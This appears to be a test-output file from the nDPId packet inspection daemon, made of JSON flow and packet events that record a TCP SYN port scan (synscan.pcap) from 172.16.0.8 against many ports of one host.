+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAscmYAADgGngysEAAIQA2GNIzSH0vdUoMYAAAAAGACBAAVRAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs2lMAADQGOh+sEAAIQA2GNIzSAaHdUoMYAAAAAGACBAAy7gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsxpQAAC8GUt6sEAAIQA2GNIzSgAPdUoMYAAAAAGACEACoiwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsEeAAACgGDpOsEAAIQA2GNIzSF3HdUoMYAAAAAGACBAAdHgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsuFoAAC8GYRisEAAIQA2GNIzSBd\/dUoMYAAAAAGACEAAisAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/1UAACcGIh2sEAAIQA2GNIzSBDTdUoMYAAAAAGACEAAkWwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsi7oAADYGhrisEAAIQA2GNIzSD6LdUoMYAAAAAGACDAAc7QAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAswXcAACgGXvusEAAIQA2GNIzSADHdUoMYAAAAAGACBAA0XgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsersAAC4Gn7esEAAIQA2GNIzSCD\/dUoMYAAAAAGACDAAkUAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs4xUAADoGK12sEAAIQA2GNIzSAQjdUoMYAAAAAGACDAArhwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs0AcAADMGRWusEAAIQA2GNIzSBdzdUoMYAAAAAGACEAAiswAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs3jUAACkGQT2sEAAIQA2GNIzSwAndUoMYAAAAAGACCABwhQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs4bMAACsGO7+sEAAIQA2GNIzSBDndUoMYAAAAAGACEAAkVgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0gAADYGSyqsEAAIQA2GNIzSCcTdUoMYAAAAAGACDAAiywAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsMJQAADkG3t6sEAAIQA2GNIzSGafdUoMYAAAAAGACCAAW6AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsmh8AADkGdVOsEAAIQA2GNIzSBAndUoMYAAAAAGACCAAshgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsyJIAAC0GUuCsEAAIQA2GNIzSAnfdUoMYAAAAAGACCAAuGAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsRs4AAC8G0qSsEAAIQA2GNIzSAojdUoMYAAAAAGACEAAmBwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsYAYAAC0Gu2ysEAAIQA2GNIzSB9LdUoMYAAAAAGACCAAovQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ0cAACsGtiusEAAIQA2GNIzSAVTdUoMYAAAAAGACEAAnOwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsgsYAADsGiqysEAAIQA2GNIzSHQvdUoMYAAAAAGACEAALhAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsnEMAACsGgS+sEAAIQA2GNIzSGojdUoMYAAAAAGACEAAOBwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsYIUAAC0Guu2sEAAIQA2GNIzSAw\/dUoMYAAAAAGACCAAtgAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAs5r4AAC4GM7SsEAAIQA2GNIzSBHvdUoMYAAAAAGACDAAoFAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060701,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 